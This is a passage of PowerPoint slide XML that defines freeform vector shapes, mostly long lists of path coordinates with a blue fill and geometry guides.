                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="110"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36336" name="Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4201" y="2474"/>
                <a:ext cx="141" cy="308"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 141"/>
                  <a:gd name="T1" fmla="*/ 112 h 308"/>
                  <a:gd name="T2" fmla="*/ 16 w 141"/>
                  <a:gd name="T3" fmla="*/ 95 h 308"/>
                  <a:gd name="T4" fmla="*/ 20 w 141"/>
                  <a:gd name="T5" fmla="*/ 77 h 308"/>
                  <a:gd name="T6" fmla="*/ 32 w 141"/>
                  <a:gd name="T7" fmla="*/ 79 h 308"/>
                  <a:gd name="T8" fmla="*/ 40 w 141"/>
                  <a:gd name="T9" fmla="*/ 54 h 308"/>
                  <a:gd name="T10" fmla="*/ 48 w 141"/>
                  <a:gd name="T11" fmla="*/ 33 h 308"/>
                  <a:gd name="T12" fmla="*/ 70 w 141"/>
                  <a:gd name="T13" fmla="*/ 22 h 308"/>
                  <a:gd name="T14" fmla="*/ 77 w 141"/>
                  <a:gd name="T15" fmla="*/ 15 h 308"/>
                  <a:gd name="T16" fmla="*/ 83 w 141"/>
                  <a:gd name="T17" fmla="*/ 3 h 308"/>
                  <a:gd name="T18" fmla="*/ 93 w 141"/>
                  <a:gd name="T19" fmla="*/ 6 h 308"/>
                  <a:gd name="T20" fmla="*/ 102 w 141"/>
                  <a:gd name="T21" fmla="*/ 16 h 308"/>
                  <a:gd name="T22" fmla="*/ 102 w 141"/>
                  <a:gd name="T23" fmla="*/ 44 h 308"/>
                  <a:gd name="T24" fmla="*/ 90 w 141"/>
                  <a:gd name="T25" fmla="*/ 57 h 308"/>
                  <a:gd name="T26" fmla="*/ 86 w 141"/>
                  <a:gd name="T27" fmla="*/ 78 h 308"/>
                  <a:gd name="T28" fmla="*/ 95 w 141"/>
                  <a:gd name="T29" fmla="*/ 76 h 308"/>
                  <a:gd name="T30" fmla="*/ 107 w 141"/>
                  <a:gd name="T31" fmla="*/ 90 h 308"/>
                  <a:gd name="T32" fmla="*/ 117 w 141"/>
                  <a:gd name="T33" fmla="*/ 95 h 308"/>
                  <a:gd name="T34" fmla="*/ 117 w 141"/>
                  <a:gd name="T35" fmla="*/ 110 h 308"/>
                  <a:gd name="T36" fmla="*/ 128 w 141"/>
                  <a:gd name="T37" fmla="*/ 121 h 308"/>
                  <a:gd name="T38" fmla="*/ 140 w 141"/>
                  <a:gd name="T39" fmla="*/ 120 h 308"/>
                  <a:gd name="T40" fmla="*/ 130 w 141"/>
                  <a:gd name="T41" fmla="*/ 134 h 308"/>
                  <a:gd name="T42" fmla="*/ 123 w 141"/>
                  <a:gd name="T43" fmla="*/ 140 h 308"/>
                  <a:gd name="T44" fmla="*/ 109 w 141"/>
                  <a:gd name="T45" fmla="*/ 149 h 308"/>
                  <a:gd name="T46" fmla="*/ 91 w 141"/>
                  <a:gd name="T47" fmla="*/ 154 h 308"/>
                  <a:gd name="T48" fmla="*/ 89 w 141"/>
                  <a:gd name="T49" fmla="*/ 169 h 308"/>
                  <a:gd name="T50" fmla="*/ 88 w 141"/>
                  <a:gd name="T51" fmla="*/ 179 h 308"/>
                  <a:gd name="T52" fmla="*/ 99 w 141"/>
                  <a:gd name="T53" fmla="*/ 195 h 308"/>
                  <a:gd name="T54" fmla="*/ 105 w 141"/>
                  <a:gd name="T55" fmla="*/ 209 h 308"/>
                  <a:gd name="T56" fmla="*/ 101 w 141"/>
                  <a:gd name="T57" fmla="*/ 223 h 308"/>
                  <a:gd name="T58" fmla="*/ 105 w 141"/>
                  <a:gd name="T59" fmla="*/ 243 h 308"/>
                  <a:gd name="T60" fmla="*/ 110 w 141"/>
                  <a:gd name="T61" fmla="*/ 261 h 308"/>
                  <a:gd name="T62" fmla="*/ 118 w 141"/>
                  <a:gd name="T63" fmla="*/ 282 h 308"/>
                  <a:gd name="T64" fmla="*/ 100 w 141"/>
                  <a:gd name="T65" fmla="*/ 307 h 308"/>
                  <a:gd name="T66" fmla="*/ 105 w 141"/>
                  <a:gd name="T67" fmla="*/ 287 h 308"/>
                  <a:gd name="T68" fmla="*/ 102 w 141"/>
                  <a:gd name="T69" fmla="*/ 281 h 308"/>
                  <a:gd name="T70" fmla="*/ 96 w 141"/>
                  <a:gd name="T71" fmla="*/ 251 h 308"/>
                  <a:gd name="T72" fmla="*/ 88 w 141"/>
                  <a:gd name="T73" fmla="*/ 216 h 308"/>
                  <a:gd name="T74" fmla="*/ 84 w 141"/>
                  <a:gd name="T75" fmla="*/ 205 h 308"/>
                  <a:gd name="T76" fmla="*/ 75 w 141"/>
                  <a:gd name="T77" fmla="*/ 191 h 308"/>
                  <a:gd name="T78" fmla="*/ 69 w 141"/>
                  <a:gd name="T79" fmla="*/ 204 h 308"/>
                  <a:gd name="T80" fmla="*/ 52 w 141"/>
                  <a:gd name="T81" fmla="*/ 217 h 308"/>
                  <a:gd name="T82" fmla="*/ 48 w 141"/>
                  <a:gd name="T83" fmla="*/ 213 h 308"/>
                  <a:gd name="T84" fmla="*/ 43 w 141"/>
                  <a:gd name="T85" fmla="*/ 210 h 308"/>
                  <a:gd name="T86" fmla="*/ 34 w 141"/>
                  <a:gd name="T87" fmla="*/ 214 h 308"/>
                  <a:gd name="T88" fmla="*/ 37 w 141"/>
                  <a:gd name="T89" fmla="*/ 192 h 308"/>
                  <a:gd name="T90" fmla="*/ 30 w 141"/>
                  <a:gd name="T91" fmla="*/ 162 h 308"/>
                  <a:gd name="T92" fmla="*/ 21 w 141"/>
                  <a:gd name="T93" fmla="*/ 160 h 308"/>
                  <a:gd name="T94" fmla="*/ 25 w 141"/>
                  <a:gd name="T95" fmla="*/ 153 h 308"/>
                  <a:gd name="T96" fmla="*/ 15 w 141"/>
                  <a:gd name="T97" fmla="*/ 146 h 308"/>
                  <a:gd name="T98" fmla="*/ 11 w 141"/>
                  <a:gd name="T99" fmla="*/ 139 h 308"/>
                  <a:gd name="T100" fmla="*/ 0 w 141"/>
                  <a:gd name="T101" fmla="*/ 129 h 308"/>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141"/>
                  <a:gd name="T154" fmla="*/ 0 h 308"/>
                  <a:gd name="T155" fmla="*/ 141 w 141"/>
                  <a:gd name="T156" fmla="*/ 308 h 308"/>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141" h="308">
                    <a:moveTo>
                      <a:pt x="6" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
